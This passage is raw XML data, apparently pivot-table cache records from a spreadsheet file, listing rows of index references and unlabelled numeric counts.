  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="29"/>
    <x v="511"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="511"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="27"/>
    <x v="512"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="512"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="512"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="512"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="512"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="22"/>
    <x v="297"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="55"/>
    <x v="297"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="513"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="513"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="513"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="513"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="431"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="431"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="431"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="514"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="514"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="514"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="514"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="514"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="514"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="515"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="515"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="515"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="32"/>
    <x v="516"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="516"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="13"/>
    <x v="516"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="68"/>
    <x v="516"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="322"/>
    <x v="516"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="538"/>
    <x v="516"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="516"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="516"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="518"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="518"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="518"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="518"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="518"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="518"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="23"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="19"/>
    <x v="517"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="517"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="517"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="13"/>
    <x v="517"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="142"/>
    <x v="517"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="272"/>
    <x v="517"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="519"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="519"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="519"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="519"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="519"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="519"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="520"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="520"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="520"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="520"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="520"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="520"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="520"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="521"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="521"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="521"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="521"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="521"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="521"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="521"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="25"/>
    <x v="522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="522"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="522"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="522"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="522"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="51"/>
    <x v="522"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="91"/>
    <x v="522"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="522"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="522"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="523"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="523"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="524"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="524"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="524"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="524"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="524"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="260"/>
    <x v="524"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="524"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="524"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="525"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="525"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="525"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="525"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="525"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="525"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="526"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="526"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="526"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="526"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="526"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="526"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="526"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="526"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="527"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="527"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="527"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="527"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="528"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="528"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="528"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="528"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="528"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="528"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="529"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="529"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="529"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="529"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="529"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="529"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="529"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="529"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="530"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="530"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="530"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="530"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="530"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="531"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="531"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="531"/>
  </r>
